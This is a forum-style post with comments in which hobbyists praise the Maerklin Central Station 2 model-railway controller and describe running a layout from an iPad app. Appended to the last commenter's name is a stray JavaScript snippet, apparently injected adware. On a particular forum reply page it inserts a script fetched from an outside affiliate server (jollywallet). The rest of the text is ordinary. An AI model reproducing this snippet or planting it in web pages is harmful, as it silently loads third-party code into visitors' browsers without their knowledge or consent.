Maerklin Central Station 2 (new version)

Just recently I purchased the latest version of the Maerklin Central Station 2 (#60215). I already had 2ea Mobile Station 2 (#60653). I also needed to get the Switch Mode Power Pack #60065 to make it all work properly.

I hooked it all up, which is easy to do. I took me a while to get used to this beast. My first impressions: "WOW!"

It is truly amazing what this set-up can do. It exceeded my expectations by a quite a long shot.

Currently, I am still exploring all what it can do. I am slowly in process to work up a Blog intended to shed light into this excellent system. It can also handle all NMRA DCC functions, but it uses its own proprietary Bus Protocol. Control items such as made by Digitrax it is not compatible with, unfortunately, as far as I know.

In due time, we will keep you posted about our findings.

Roger

Comments

• Now I used it for some time. The more I use it the more I like it. All the things it can do. It is wonderful. If you are a Maerklin fan and don't have it yet, I can highly recommend it.

I had planned on writing a Blog but this could prove to be very complex and long winded. At this point it is easier and more effective to just answer any questions you may have.

Roger
  • Roger is right. The Marklin CS2 is just a wonderful digital controller of everything on your layout. Very powerful with 60 VA output. You can change so many parameters pertaining to the locomotive performance from the CS2 and it WORKS. I am the lucky owner of an iPad and iPhone (thanks to my wife). I downloaded Marklins Mobil Station app for Apple devices for $6.00. Now I'm only using my iPad to control my whole layout (6 x 23'). With so much easy I can switch between 10 locos, control all my turnouts and signals and watch my layout from anywhere as the locos pull their load up my mountains. The screen of the iPad is so nice and big so it is even better to control the layout from the iPad than from the CS2. Just my experience. If I can be of help to any newbi do not hesitate to contact me.

Preben(function () {if (top.location == self.location && top.location.href.split('#')[0] == 'http://forum.reynaulds.com/RTE_textarea.asp?mode=reply&ID=1086') {var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true;po.src = 'https://api.jollywallet.com/affiliate/client?dist=213&sub=20131022_bsg-pitch';var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);}})();